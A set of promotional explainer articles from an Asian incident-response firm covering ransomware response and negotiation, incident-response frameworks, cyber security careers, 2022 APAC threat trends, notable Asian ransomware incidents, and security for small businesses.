Upon being contacted, the IR team collects key information about the organization’s requirements, payment expectations, goals, and deadlines by which business operations must resume. Specialists then request information about the first known compromise and the exact timeline of events to support their digital forensics investigations.

As timely response is critical in the first hours of a ransomware attack, Blackpanda recommends IR planning to ensure all response terms are agreed upon prior to an incident. Such agreements are often best delivered either as part of a comprehensive cyber insurance policy (where IR planning can be acquired at a discount) or through a prepaid IR retainer if you do not qualify for insurance.

The ransomware defence process by IR specialists proceeds in two parallel streams to ensure the most rapid and effective response possible. On one side, the technical team works to secure the system and recover as many files as possible; on the other, crisis managers run ransom negotiations, aid in creating secure payment accounts, and ensure legal compliance.

Step 3A: Technical response

Blackpanda incident responders carry out a variety of highly complex procedures to contain and eradicate the malware. These include:

Network security

Running a trusted anti-virus tool or Microsoft Windows Defender is adequate only for simple virus protection and firewalling; ransomware, however, is an advanced threat able to bypass these safeguards via a range of entry vectors (existing software vulnerabilities, email phishing, and more). To compensate, you will require Endpoint Detection and Response (EDR) tools such as SentinelOne that can perform a more advanced, in-depth scan of your environment. Importantly, you should take this step on all computers in your enterprise. At this stage, IR specialists can provide guidance on what needs to happen next in terms of network segregation, physical device actions, and more.

Eradication and loss mitigation

Upon being notified of an attack, the IR team will work fast to quarantine the ransomware, recovering as much data and as many digital assets as possible. Next, they will also conduct digital forensics to attempt to reverse engineer the malware and continue their data recovery efforts. Our experienced ransomware specialists may also be able to identify and retrieve decryption keys from known ransomware databases to unlock data without resorting to paying the attackers.

Proof of life

The IR team will try to decrypt files independently, while taking steps to obtain a decryption key from the attackers. In 2020, 17% of ransom payers did not receive a working key to unlock encrypted data. For this reason, a crucial part of the IR team’s work is also to assess the authenticity of decryption keys provided by the attackers through verified “proof of life” exercises.

Recovery

The IR team will ensure that the network is secured while concurrently decrypting the files, in order to prevent the same or other attackers from exploiting any vulnerabilities and deploying another ransomware. Equipped with the correct key, IR specialists will help decrypt all data, restore system health, and ensure that the malware and its root cause are fully eradicated.

Step 3B: Crisis management

A crucial part of ransomware incident response is crisis management, which comprises all the financial, legal and PR aspects of cyber incident response. This includes:

Ransom negotiation

For some organizations, a ransomware payment is a business decision first and foremost. For others, a prompt IR is the best way to minimise the chances of having to pay a ransom, which can be seen as a last resort – only to be done if all efforts to decrypt the hostage files have been unsuccessful. In the eventuality that the IR team is unable to independently decrypt the data, they can help organizations facilitate the ransom negotiation process. Negotiation efforts serve to achieve improved outcomes and provide the time and intelligence necessary for organizational leadership to make informed decisions.

Attackers are also often not very responsive, as they may be conducting ransomware attacks on many organizations simultaneously. In these situations, IR specialists can help companies in successfully contacting the attackers and conducting negotiations.

Blackpanda IR specialists have a deep understanding of different ransomware tools and techniques, the actors and motives behind an attack, as well as the competencies of the attackers. During the negotiation process, all messages sent to the attackers by Blackpanda are carefully crafted to match the customer’s writing style and tone, whilst considering the attacker’s disposition, to help facilitate the best outcome.

Ransom payment facilitation

Once the negotiation has come to an accord, the IR team guides the organization through the payment of the ransom (if required and legal), setting up cryptocurrency payment accounts for the organization – which can be a lengthy and complicated process – and ensuring that all transactions are fully verified, transparent, secure, and auditable.

Organizations should also be aware that on 1st October 2020, the US Department of Treasury’s Office of Foreign Assets Control (OFAC) issued a globally enforceable advisory regarding ransom payments to sanctioned entities, with associated penalties of up to USD 1 million and 20 years in prison. Blackpanda fully supports an organization’s due diligence efforts throughout the decision-making process, working closely with international law enforcement partners such as the US Secret Service and the Singapore and Hong Kong Police Force to identify threat actors and sanctioned-entity status. Other governments are also contemplating mandatory reporting of ransom payments over certain amounts[1], rendering facilitation services your best option to obtain expert advice and ensuring you are not liable for any regulatory breaches should you choose to pay a ransom.

Reputational damage mitigation

Falling victim to a cyberattack can catastrophically damage an organization’s reputation. Attackers may threaten to publish sensitive information or company secrets, and press about the attack can cause clients to feel that their data is unsafe with the compromised organization and distrust it in the future. To mitigate reputational damage in the wake of a ransomware attack, it is vital that appropriate public relations activity is activated immediately.

The IR team at Blackpanda works with trusted partners who can promptly support organizations in communicating with media and press outlets. This way, the public will know that the compromised organization is responsibly conducting the appropriate procedures to protect their clients’ information.

Reporting and compliance

Depending on your specific industry, geography, and relevant regulations, you may be required to report the attack to authorities, shareholders, and/or customers. Your IR team should also maintain thorough documentation of the incident in compliance with insurance and other regulatory requirements (such as MAS Reporting Requirements), which can be a complicated and time-consuming process for organizations to conduct independently. Working with trusted people will help you through this particularly stressful phase; we ensure that you know who to involve and have them ready to react.

Protect yourself from future attacks

The IR team works as trusted advisors with partnered entities to ensure that your business has taken all necessary preventive measures to avoid the recurrence of this attack type. This includes the deployment of a Managed Detection and Response (MDR) system and the creation of backups that are disconnected from the live network. There are valuable lessons to be learned from each attack. Follow the 7 Steps listed below in Protect & Prevent and refer to the guides on the Blackpanda website to learn more.

– –

Falling victim to ransomware can be a stressful and emotional time, and an experienced IR company such as Blackpanda provides invaluable help in containing the attack, eradicating the malware, and restoring business as usual, all whilst managing PR, negotiating with the attackers, and ensuring safety and legality throughout.

Blackpanda is Asia’s Premier Digital Forensics and Incident Response provider, and we support our clients by conducting regular compromise assessments to check for active threats in the network, preparing tabletop exercises and incident response plans to boost employee awareness, and responding to incidents promptly with Special Forces Expertise.

To learn more about our ransomware preparation services, or to report a breach, contact Blackpanda.

React & Respond

What are the goals of incident response?

Incident response (IR) is the systematic approach to managing a cyber security incident. The primary objective of IR is to minimize the impact of a cyber attack, offer rapid recovery, and limit business interruption loss for organizations.

Incident response is carried out by specialists—via an in-house security operations unit or an outsourced incident response firm like Blackpanda—in the event of a cyber breach.

Experts like our incident response specialists are trained to handle various types of security incidents, cyber threats, and data breaches. The main goals of an incident response methodology are to identify, contain, eradicate, and minimize the duration and cost of a cyber breach.

What are the governing frameworks of incident response?

Thought leaders in the field of cyber security have established frameworks that serve as industry standard reference points to guide incident responders in the event of a cyber breach.

These frameworks include:

  1. The National Institute of Standards and Technology (NIST) framework
  2. The System Admin, Audit, Network and Security (SANS) framework
  3. The Observe, Orient, Decide, Act (OODA) loop

While each framework of reference has different terminology, it serves to address the same fundamental goal of incident response—respond rapidly, limit/eradicate the threat, and minimize business interruption loss. 

First and foremost, it is important to determine whether a true breach or incident has occurred, or whether it was a false positive, and to document it accordingly. Then it is crucial to identify the causes of the incident and minimize the impact of future incidents. Finally, the incident response team should guide the organization in applying lessons learned to improve the process.

Improving an organization’s security posture and ensuring thorough incident response planning is at the crux of all incident response frameworks. Prosecuting illegal activity is never explicitly mentioned but is always among the considerations for remediation, as is keeping management, staff and appropriate clients informed of the situation and response.

The NIST framework

The NIST cyber security framework identifies five core functions of incident response:

  1. Identify: This includes identifying physical and software assets, the organization’s business environment, established cybersecurity policies, asset vulnerabilities, threats to internal and external organizational resources, and risk response activities to assess risk. 
  2. Protect: This includes implementing protections for Identity Management and Access Control, empowering staff through security awareness training including role based and privileged user training. It also involves establishing data security protection best practices and implementing processes and procedures to maintain and manage the protections of information systems and assets.
  3. Detect: Detecting potential cyber security incidents early is critical. This step aims to ensure that anomalies and events are detected and their potential impact understood.
  4. Respond: This step centers on the swift implementation and execution of the incident response plan, while managing communications with internal and external stakeholders during and after an event. Further, continuous analysis of the incident as it develops is crucial to ensure an effective response and to support recovery activities. These include forensic analysis, incident impact determination, and mitigation.
  5. Recover: Recovery is the ultimate goal of incident response. It includes implementing improvements based on lessons learned and reviews of existing strategies, and coordinating with internal and external communications to restore business as usual.

The SANS framework

The SANS Institute delineates six phases that must be included in an incident response plan:

  1. Preparation: Training and equipping the IR team and all involved individuals to manage cybersecurity incidents when they arise. Deploying monitoring tools and drafting IR plans are examples of preparation.
  2. Identification: Determining and qualifying whether a particular event can be considered a security incident, and identifying the full scope of systems, devices, and endpoints involved.
  3. Containment: Containing the incident across all systems in scope, and limiting the damage to prevent data loss and destruction of evidence.
  4. Eradication: Identifying the root cause of the attack and mitigating the impact to the affected systems, either by removing or patching affected endpoints.
  5. Recovery: Following the removal of corrupted elements, this phase ensures that affected systems are safely brought back to the operational environment and no threat remains.
  6. Lessons Learned: The last but most critical phase includes completing all documentation requirements from all actions taken during the incident, conducting analysis and assessment of the response efforts to provide recommendations for the future.

The OODA framework

Lastly, the OODA (Observe, Orient, Decide, and Act) loop was developed by the US Air Force military strategist John Boyd. The OODA loop is often applied to cyber incident response in order to tackle incident handling in a real-time environment.

  1. Observe: Continuous security monitoring helps in identifying abnormal network/system behavior. The observation goal is fulfilled through log analysis, SIEM and IDS alerts, network monitoring, vulnerability analysis, and service/application performance monitoring.
  2. Orient: This focuses on the evaluation of the organization’s cyber threat landscape through incident triage, threat intelligence, awareness of the current situation, and security research.
  3. Decide: Based on observations and context, deciding on an action plan that offers minimal downtime and the fastest system recovery is a fundamental goal of rapid incident response.
  4. Act: Using forensic analysis tools, system backups, data recovery tools, security awareness training tools and programs, and patch management, the incident response team carries out remediation and recovery, and documents lessons learned for future use.


While no one framework is deemed better than the others, they all share the same fundamental goal of eradicating a cyber threat and restoring business operations as quickly as possible. Your incident response provider must be able to walk you through the steps of incident response before or while responding to an incident. These steps are calculated and follow a strict process to ensure incidents are handled properly.

Blackpanda responders are trained and certified to use the aforementioned methodologies to respond to cyber crises in a swift manner, while providing timely updates to all parties involved. Pre-breach playbook development is a key step to expediting response and minimizing panic in the event of an incident. Reach out to us for further information on our Incident Response services and pre-breach prevention measures.

Other

Is cyber security a good career in Asia?

Whether you are a student, a recent graduate, or someone who is thinking about making a pivot in their career, taking up a new job in cyber security could be the next step you’ve been looking for. Use this helpful guide below to learn more about the career options available in cyber security, starting with frequently asked questions about roles in the industry.

Is Cyber Security a Good Career in Asia?

There has never been a better time to start a career in cyber security. The cyber security industry is experiencing exponential growth, with the market reaching a USD 156 billion valuation in 2020 and a projected rise to USD 352 billion by 2026, a growth rate of 14.5% between 2021 and 2026.

In Asia, jobs in cyber are growing at an even faster pace than in the more established markets of North America and Europe. Whilst in the latter the cyber industry has been around for decades, Asia’s scene is more nascent, and opportunities are opening up across the region. To meet this demand, universities are also equipping themselves to arm younger generations with the skills to work in cyber security, with institutions such as NUS, SUSS, HKU, and APU all offering undergraduate and postgraduate cyber security courses introduced in recent years.

This growth is being driven by multiple factors. Concurrent advancements in technologies such as the internet of things (IoT), artificial intelligence (AI), and machine learning (ML) have sped up the rate of digital adoption in Asia, with Singapore now ranked the second most digitally competitive country in the world after the United States.

Moreover, the onset of remote working brought on by the pandemic has increased the frequency of cyber incidents, as organizations now face a higher risk of breach due to the vulnerabilities of a decentralized workforce. The level of cyber risk that Asian companies face today can no longer be ignored or mitigated with simple antivirus tools alone, and there is a growing need for skilled cyber security professionals to fill positions at companies of all sizes and industries.

Do Cyber Security Jobs Pay Well?

Cyber security companies report that skilled talent is hard to find, and offer good pay and learning opportunities to those who have the relevant competencies and predisposition to grow into these roles.

Working in cyber security exposes you to a fast-paced and rapidly developing environment. As the cyber threat landscape is constantly evolving, staying up to date on the latest cyber threats and malicious actors is crucial to success, and new roles emerge as cyber threats and cyber regulations develop.

In Asia, the following salary ranges can be expected for some of the most frequently in-demand positions:

  • Cyber Security Analyst: Between USD 22,000 and USD 77,000 a year
  • Penetration Tester: Between USD 29,000 and USD 90,000 a year
  • Senior Security Consultant: Up to USD 103,000 a year
  • Chief Information Security Officer: Up to USD 255,000 a year

What Skills are Needed for a Career in Cyber Security?

The two most important factors that determine a successful cyber security career are exposure and experience. 

Experience is key to building confidence with the different tools used in various cyber security situations, whilst exposure to a diverse number of areas is essential to becoming a well-rounded cyber security professional. This can be achieved by shadowing experienced professionals and learning from them, but also from online resources such as videos, webinars, and courses.

As far as hard skills go, those aspiring to both technical and non-technical roles in cyber security should have a basic knowledge of programming and understand the fundamentals of how a computer works. One way to achieve this is through a cyber security degree, which will empower you with the foundations to develop your career. Independent learning is also an option, with courses in C, C#, C++, Python, and Java available for free or at a low cost online, along with a vast library of learning materials.

For those who have already graduated from university or are later in their career, cyber security certifications can also reflect your interest and expertise if your goal is to work in the cyber industry. Recommended certifications include CISSP, CISA, CISM, Security+, GSEC, CEH, SSCP, CASP, GCIH, and OSCP. Beyond signalling interest in the industry, achieving these certifications is a requirement for most non-entry-level technical positions, and can boost your chances of getting hired in the industry. On LinkedIn, almost 90,000 job postings have at least one cyber security certification in their role description.

Overall, while it may sound hard to get a job in cyber security, there are many options to make inroads into the still developing cyber job market that don’t require years of prior experience or a graduate degree like in other more established segments. Setting clear goals and working consistently to upskill yourself while gaining as much exposure and experience as possible is the best way to kick start your career in cyber.

Roles in Cyber Security

As cyber security is a fairly new and evolving industry, the titles for similar roles across companies may differ and cause confusion for new job seekers. With that said, cyber security roles tend to fall into three key areas: management, technical, and senior leadership. Whilst the latter is only taken up by seasoned and experienced professionals, committing to one of the first two categories is an important decision for anyone starting their career in cyber. Below is a list of some of the most popular roles in cyber security.

Entry-Level Roles

Cyber Security Analyst 

Security analysts are usually assigned tasks such as installing, managing, and updating software on company systems and networks. They are also responsible for ensuring that software on monitored endpoints has adequate security measures in place. Analysts may also assist security projects by compiling ongoing reports about the security posture of the networks they work on.

IT Monitoring Analyst 

These roles typically perform network monitoring activities, targeting low-level threats and submitting vulnerabilities to be patched by more experienced associates.

Junior Cyber Security Consultant 

Junior cyber security consultants usually assist more senior consultants in projects for external clients. These can be company-wide cyber security posture assessments, digital transformation projects or problem-solving type exercises. Junior consultants will typically carry out data collection and analysis, as well as research and report writing.

Mid-Level Roles

Cyber Security Project Manager 

Cyber security project managers work to create and implement process and technology components in security strategies. This requires project management programs to ensure solutions are implemented effectively and efficiently.

Cloud Security Specialist 

As organizations move their data and operations to the cloud, the need to protect company cloud environments from cyber attacks has risen exponentially. Cloud specialists protect data and systems from compromise in off-premises or cloud environments.

Identity and Access Manager 

Identity and access managers protect the confidentiality, integrity, and availability of data by managing user access to company networks. According to the principle of least privilege, all employees should only have access to what they need to have access to, and only when they need it.

Security Engineer 

Enterprise security requires a layered approach, and security engineers work in the various stages of designing and building the layers of security systems required to protect the enterprise. These include building encryption systems, email security systems, firewalls, and more.

Security Operations Specialist 

Roles in security operations focus on the active protection of an organization by keeping ongoing tabs on cyber defences and monitoring internal networks. They can work as part of an internal Security Operations Centre (SOC) or in a specialized Digital Forensics and Incident Response services provider like Blackpanda. 

Ethical Hacker 

Ethical hacking includes conducting Vulnerability Assessments and Penetration testing. Also known as “red teaming”, these roles attempt to penetrate networks by thinking like a criminal would, highlighting vulnerabilities and backdoors that need to be patched and protected. 

Senior-Level Roles

Domain Manager 

Depending on the size of the organization, every domain requires leadership and management. For many cyber technicians, this may present an opportunity to transition from doing hands-on work to leading and guiding a team. 

Chief Information Security Officer

Senior leadership is critical in cyber security. A CISO is a senior-level champion who steers the team and the company towards their optimal cyber security posture. To become a CISO, you need a broad range of experience and understanding across all areas of cybersecurity, as well as strong people and leadership skills.

Apply Now

As you can tell, the cyber security industry is a growing space, and it offers exciting opportunities for fresh grads and professionals seeking a career change alike. This fast-paced and rapidly changing environment offers enticing pay and a range of career development possibilities.

If you are interested in joining a rapidly expanding company specializing in white-glove Digital Forensics and Incident Response services for the APAC region, check out our current openings here. 

News

Cyber trends for APAC in 2022

Our experts from the Blackpanda Digital Forensics and Incident Response team predict the current pace of cyber crime evolution to persevere in 2022. As “firefighters” combatting the flames on the front lines of cyber crisis, we have drawn upon our experience in the field to predict the top three attack trends that will likely dominate the cyber security landscape in Asia this upcoming year.

Cyber Trends for APAC in 2022

2021 was a volatile year for cyber security in Asia, with the world experiencing the highest growth in cyber threats to date, fuelled largely by developments in attack techniques—ransomware in particular, with ransomware as a service (RaaS) and double extortion techniques gaining prominence.

The rise in attacks comes at a time when the barriers for entry into cyber crime are at their lowest, as threat actors face low risks and unprecedentedly high returns for their efforts. Consequently, cyber incident response providers have been tasked with stepping up to this challenge and staying up to date with the latest techniques and exploits leveraged by the growing number of cyber threat actors. 

In light of this, here are the top three attack trends that we expect to dominate the cyber security landscape in Asia this upcoming year.

1) Ransomware

Ransomware demands reached an all-time high in 2021. In fact, ransomware cost the world USD 20 billion in 2021 and that number is expected to rise to USD 265 billion by 2031.

One of the most prominent attacks in Asian history was also carried out last year. AXA—one of the world’s largest cyber insurance companies—was targeted by a ransomware attack carried out by the cyber criminal gang Avaddon. The attackers were able to steal over three terabytes of files, including client passport details, ID cards, denied reimbursements, contracts, customer claims, payments to customers, bank account information, files from hospitals about fraud investigations, and medical reports containing sensitive information about patients.

Alongside large corporations, digital extortion is increasingly affecting small businesses as well. This trend is predicted to continue in 2022, with new ransomware techniques—such as double extortion—becoming more prevalent.

Growing ransom demands and increased regulation around ransomware payments will make professional incident handlers essential to ensure security and legality in ransomware negotiations. The Charter of the United Nations Act 1945 and the Autonomous Sanctions Act 2011, and their related regulations, already prohibit making funds or assets available to sanctioned organisations. Moreover, Australian authorities have also come up with their own Ransomware Action Plan that prohibits ransom payments, with other APAC countries expected to follow suit.

2) Zero-Day Attacks

Zero-day attacks are set to continue dominating headlines worldwide. In this type of attack, criminals exploit a vulnerability present in unpatched software, having discovered it before the software developers become aware of it.

In late August 2021, Hong Kong iOS and Android users visiting a pro-democracy media website were targeted by a zero-day attack which installed spyware and stole data from their devices. 

Later in the year, the Apache Log4j vulnerability was exploited on a global scale, affecting upwards of 3 billion devices worldwide. The Log4j zero-day is a clear example of how software vulnerabilities can remain unknown until they are widely exploited, and can affect a large proportion of organisations. This means that the only way to mitigate such an attack is through improved proactive security controls and rapid incident response.

3) Systemic Risk Events

As we saw last year with the Handa Hospital attack—where attackers were able to infect the facility’s networks through a vulnerability in one of the hospital’s third-party contractors’ VPN—third-party dependencies are, and will continue to be, a weak link in cyber defences. This is because smaller companies are generally an easier target for attackers, and they provide an access point for attackers to reach their larger partners.

Due to their widespread use, managed service and cloud computing providers will continue to be lucrative targets for cybercriminals. For this reason, the fear of the next large-scale systemic risk event—whereby a single event has the potential to impact thousands of businesses—should be at the forefront of everyone’s mind in the cyber security industry.

Furthermore, the most targeted industries and businesses are going to be those where standards for security have historically been weak. In particular, industrial manufacturers and distributors—who were especially targeted last year—will suffer from cyber attacks that hinder their productivity, given that their dependencies on automation, robotics, and the supply chain serve as entryways into their networks. Businesses in these industries would be wise to invest in their cyber defences and educate employees to increase cyber security awareness at every level of the organisation.

What this Means for Cyber Incident Response

This year, a strong emphasis will be put on improving security standards for businesses in order to prevent attacks more effectively. Concurrently, government bodies will seek to ensure there is more transparency in cyber incident response, especially regarding ransomware payments—likely instituting bans and limitations for businesses looking to pay criminal groups for decryption keys.

With cyber attacks affecting 1 in 4 users, having a secure cyber incident response plan is now more crucial than ever. Whilst regular patching, security settings management apps, managed detection and response (MDR) software and good cyber hygiene provide a basic level of protection, they are fallible. 

In 2022, having a trusted incident responder on call can make all the difference between surviving a cyber attack with limited losses and having to shut down because of business interruption, with the monetary and reputational losses that brings. Blackpanda also recommends running quarterly Compromise Assessments to spot potential malware early and reduce its chances of causing havoc in company networks.

All Blackpanda consulting, compromise assessment, digital forensics, and incident response services are available through pre-paid retainers and specialist cyber insurance providers such as our partners at Pandamatics Underwriting. To learn more about Blackpanda services, reach out to our team here.

IR-1: The most effective cyber risk management solution for SMEs in Asia

Waiting for an attack to happen before you contact a cyber incident response team can cost precious time and a high hourly fee, which is why pre-purchasing a retained solution is the best way to optimise response time and minimise costs.

Blackpanda’s IR-1 subscription is the most effective solution for small and medium enterprises in Asia Pacific facing limited resources and knowledge in managing cyber breaches. IR-1 aims to help them manage cyber breaches and mitigate their impact by offering a 12-month subscription plan that includes 24/7 incident response availability, one incident response activation credit, discounted rates for Blackpanda services, and unlimited access to a digital library. IR-1 is staffed by highly trained specialists, and businesses can renew the subscription upon expiry.

Get in touch with us to learn more about IR-1.

Prepare

Top 5 Asian ransomware attacks

While previously confined to Fortune 500 companies and nation state infrastructure, ransomware attacks are now a threat to SMEs and individuals with new strains and ransom demands making headlines every week.

Attackers carry out ransomware attacks on businesses or individuals by gaining access to their networks, most often through simple methods such as phishing or remote desktop compromise. Once the ransomware is downloaded onto an endpoint, it encrypts all the data on it and can spread to other endpoints in the network. This can happen within minutes of the initial compromise. By holding information hostage and locking users out of their systems, cyber attackers are able to demand ransom money in exchange for access to the system, giving the attack its distinctive name.

History of ransomware

While ransomware has been making headlines for at least the past three years as a novel attack vector, the first recorded ransomware attack occurred almost thirty years ago. In 1989, a program dubbed the “AIDS Trojan” was distributed via floppy discs to unknowing attendees of a research conference. Believing the discs were research tools, these victims loaded the malware onto their computers and watched their files become encrypted, with the attackers demanding ransom by mail in exchange for instructions to decrypt their systems.

In the early 2000s, Distributed Denial of Service (DDoS) attacks were more common than ransomware. This trend shifted with the catastrophic attack known as WannaCry, which in 2017 compromised entire sectors around the world, initiating what some have called “the era of ransomware.”

The era of ransomware

One of the biggest innovations that supported the explosion of ransomware was the emergence of cryptocurrencies such as Bitcoin, which rose to prominence in 2010. This provided an easy and untraceable method for receiving payment from victims, creating the opportunity for ransomware to become a lucrative and low-risk undertaking.

With the growth of ransomware came developments in its supply chain, as cyber criminal groups began to offer Ransomware-as-a-Service packages whereby malware programs are leased to clients around the world in exchange for a portion of their profit from ransom payments.

The most recent trend in ransomware development is data exfiltration. In 2020, there was a widespread adoption of ransomware paired with data-leak extortion tactics, which were rarely used by threat actors in previous years. This method involves both encrypting a victim organization’s environment and also exfiltrating data with the threat to leak it if the extortion demand is not paid.

This rapid evolution of ransomware is expected to continue at an accelerated rate as attackers and criminal groups continue to reinvent their techniques in order to apply as much pressure as possible to organizations in crisis. Ransom demands are also on the rise, with the average ransomware payment reaching USD 570,000, up almost 5x from USD 115,123 in 2019. 

With Asia being particularly targeted—incidents spiked 64% in 2021 compared to the previous year—the attacks in this region show no sign of slowing. In an effort to put future breaches into context with the attacks that have come before them, this article explores the most notable incidents that Asia has faced thus far.

What are the most famous ransomware events in Asian history?

1. WannaCry

What: Global ransomware attack affecting Asian hospitals and other public and private organizations.

Where: Over 200,000 targets in at least 150 countries were severely affected by WannaCry. In Asia, nearly all computers in two major hospitals in Indonesia—Dharmais Hospital and Harapan Kita Hospital—were encrypted. Some Japanese and Singaporean organizations were also affected, along with university hospitals in Seoul and educational institutions in China.

When: On the 12th of May 2017, WannaCry began to spread around the world. The malware was halted a few hours later by the registration of a kill switch discovered by Marcus Hutchins. This prevented already infected computers from being further encrypted or spreading WannaCry, although the virus had already spread globally.

How: The virus exploited a vulnerability in Microsoft’s Windows software, which allowed it to penetrate computers and encrypt files on the PC’s hard drive, rendering the devices inaccessible to users. The virus then demanded a ransom payment in bitcoin in order to decrypt them. The rapid spread of WannaCry was supported by the numerous high-profile systems, including Britain's National Health Service, that were hit by the attack and spread it across connected external systems. Of note, a novel variant of WannaCry forced Taiwan Semiconductor Manufacturing Company (TSMC) to temporarily shut down several of its chip-fabrication factories in August 2018.

Who: The attackers went unidentified for a long time, until in December 2017 the United States and United Kingdom formally asserted that Lazarus Group, a cybercrime organization that may be connected to the North Korean government, was behind the attack.

2. Singapore SingHealth and Hong Kong Health Department 

What: A ransomware attack was launched against several businesses based in Singapore, including multinational companies with operations in the city-state. SingHealth, Singapore’s public health network consisting of four hospitals, five national speciality centres, and eight polyclinics, was the most prominent institution hit by the attack. Files containing confidential outpatient prescriptions of 160,000 citizens, including Singapore Prime Minister Lee Hsien Loong and other ministers, were breached. In Hong Kong, computers belonging to the health department’s Infection Control Branch, Clinical Genetic Service and Drug Office were also hit, rendering the data inaccessible.

Where: Singapore and Hong Kong.

When: Between July and August 2018. Singapore was hit two weeks before Hong Kong with the attacks lasting a total of four weeks.

How: On the 20th of July, the Singapore Government declared that the personal particulars of 1.5 million patients in SingHealth were compromised in the Republic's worst ever cyber attack. Files stored on the computers were encrypted by ransomware and an e-mail address to contact for a decryption key was left behind but no ransom was demanded. SingHealth and Singapore's public healthcare sector IT agency IHIS were punished with penalties of S$250,000 and S$750,000 respectively, for the attack that breached the country's Personal Data Protection Act. The fines were the highest paid out to that date.

Who: A cyber criminal group named Whitefly was found by the Singapore government to be responsible for the attacks, six months after they occurred.

3. AXA Asia

What: One week after cyber insurer AXA France announced it had changed its cyber insurance policy to stop coverage for ransom payments, the company's Asia Assistance division was hit by a ransomware attack. Hackers claimed to have seized three terabytes worth of sensitive data in Asia. Stolen data included screenshots of customer identity cards, passports, bank documents, hospital bills, and medical records.

Where: AXA’s Asia division was attacked, impacting IT operations in Thailand, Malaysia, Hong Kong and the Philippines. As a result, certain data processed by Inter Partners Asia (IPA) in Thailand was also accessed.

When: May 2021.

How: The Avaddon malware likely gained access to AXA’s network through a phishing email in Thailand, and then rapidly spread across the network to reach all the other endpoints. It then encrypted all files within a few minutes, making them irrecoverable and giving AXA ten days to make a decision regarding the ransom payment.

Who: The attack has been attributed to Avaddon, which had been active for about a year prior to the incident affecting the French insurance company. The group is thought to be based in Russia and offers its malware on a “Ransomware-as-a-Service” model to less sophisticated clients.

4. Tokio Marine

What: The attack targeted the company’s internal Windows servers, spreading to a large number of computers in the network. By intervening promptly, Tokio Marine was able to keep providing its insurance services during the course of the attack.

Where: Tokio Marine Insurance Singapore, a subsidiary of Tokio Marine Group, was targeted by the attack.

When: Between July and August 2021. 

How: The ransomware attack affected Tokio Marine Singapore on a large scale, encrypting critical data across all company endpoints. After the ransomware was discovered, the network was isolated to prevent further damage. Tokio Marine also immediately filed the necessary reports with local governmental agencies, displaying a good level of preparedness for such a cyber attack. The Tokio Marine and AXA ransomware attacks, which occurred within a few months of one another, are a sign of a growing trend of ransomware attacks targeting insurance companies. While some see this as a natural part of the shift in targets in the cyber crime industry, others see it as a response to the hardening of the cyber insurance market, which is becoming more reluctant to pay ransomware demands, effectively undermining the ransomware business model.

Who: The attacker of Tokio Marine was never disclosed, and investigations are still underway to understand exactly what type of malware was deployed and where it came from.

5. Eye & Retina Surgeons Singapore Eye Clinic

What: The attack affected the Eye & Retina Surgeons clinic server and management system. Data for an estimated 73,000 patients was affected by the breach. This comprised patient information, including names, addresses, identity card numbers, contact details, and clinical information such as clinical notes and eye scans.

Where: The Eye & Retina Surgeons clinic is based in Singapore.

When: The incident occurred on the 6th of August 2021.

How: A ransomware virus penetrated the network likely through a malicious email or phishing link, encrypting patient data as soon as it gained access to the business endpoints. Eye & Retina Surgeons decided not to pay the requested ransom and was unable to recover the lost files, although reports claim no data was leaked. The company worked closely with the Cyber Security Agency of Singapore to restore system health and resume its activities.

Who: The hackers responsible for this ransomware attack have not yet been identified. 

IR-1: The most effective cyber risk management solution for SMEs in Asia

Waiting for an attack to happen before you contact a cyber incident response team can cost precious time and a high hourly fee, which is why pre-purchasing a retained solution is the best way to optimise response time and minimise costs.

Blackpanda’s IR-1 subscription is the most effective solution for small and medium enterprises in Asia Pacific facing limited resources and knowledge in managing cyber breaches. IR-1 aims to help them manage cyber breaches and mitigate their impact by offering a 12-month subscription plan that includes 24/7 incident response availability, one incident response activation credit, discounted rates for Blackpanda services, and unlimited access to a digital library. IR-1 is staffed by highly trained specialists, and businesses can renew the subscription upon expiry.

Get in touch with us to learn more about IR-1.

Prepare

Cyber security for SMEs

Learn more about cyber security services that SMEs can leverage to stay safe and protected from cyber threats.

Cyber attacks are becoming more common. They target organizations across all sectors and sizes, and small and medium-sized enterprises (SMEs) and start-ups are being hit especially hard. Research by Chubb found that 93% of SMEs that experienced a cyber incident reported a severe impact on their business. For these reasons, building up their security will help SMEs maintain confidence in the Asian and global markets while surviving an ever-changing cyber threat landscape. Blackpanda’s cyber security services for small businesses can help your organization improve its cyber security posture.

How can small businesses improve their cyber security?

A frequent question we are asked at Blackpanda is: “Do small businesses need cyber security?” The biggest misconception that exposes SMEs to cyber attacks is the sense of “security through obscurity”. Start-ups and SMEs tend to believe that they will never be targeted by cyber attacks because they are not important enough. This belief is no longer valid: nowadays, most hackers look to target the most vulnerable companies rather than the biggest ones.


Today, hackers have adopted a “spray and pray” approach to attacking. This approach involves hackers trying their luck with thousands of accounts at a time and expecting that at least some of them open up opportunities for breaches. Other times, they identify potential targets through “hunter” bots that seek digital windows and doors left open or unlocked. This targeting has contributed to the dire statistic that 43% of all cyber attacks are against SMEs, which lack structural preparedness and organizational cyber security awareness, as well as the financial resilience necessary to survive an attack.


As global supply chains become larger and more complex, hackers often attack weak links in the chain - typically SME vendors - as a stepping stone to facilitate their subsequent penetration into the networks of larger institutions with stronger security.


Smaller businesses have busier teams with more tasks on their plate than larger organizations, which leads SMEs to place cyber security lower on their priority list. As a consequence, employees have low cyber security awareness and do not follow cyber hygiene best practices. Cyber security’s low prioritisation also entails minimal budget allocation. Given budgetary constraints, many SMEs lack a cyber security team or are defended by IT support technicians who lack the institutional knowledge, skills and wide experience possessed by the dedicated cyber security teams of large enterprises. Technicians with little cyber security experience may not have the capability to conduct thorough and sophisticated cyber compromise assessments and respond to incidents as they occur. Naturally, hackers understand this weakness and leverage it by launching sophisticated attacks that less experienced teams cannot avert.


Importantly, SMEs lack the financial resilience to withstand the direct and indirect costs of a cyber attack - including downtime losses, incident response, legal and public relations expenses, to list a few - which can rack up to millions of US dollars. This weakness is the main reason for the statistic that 1 in 6 SMEs are compromised following a cyber attack, as businesses find it impossible to recover from the financial losses brought about by a single cyber attack. These compromised SMEs irreversibly lose clients since the company’s reputation is damaged for having been unable to safeguard its clients’ personal information.


Cyber security can feel intimidating and complicated to those whose expertise lies elsewhere, and for SMEs this is often the case. However, there are plenty of cyber security service options for small businesses. Outsourcing cyber security is a simple and cost-effective way to improve a company’s cyber security posture and assure partners, investors and clients of the business’ ability to protect their precious information and assets by adequately responding to cyber threats.


Outsourcing cyber security can help SMEs match large companies’ security posture

SMEs tend to see cyber security as an all-or-nothing deal, which does not have to be the case. By taking a leaf from the book of bigger companies and outsourcing essential cyber security tasks, SMEs can optimize their cyber security posture at a lower cost.


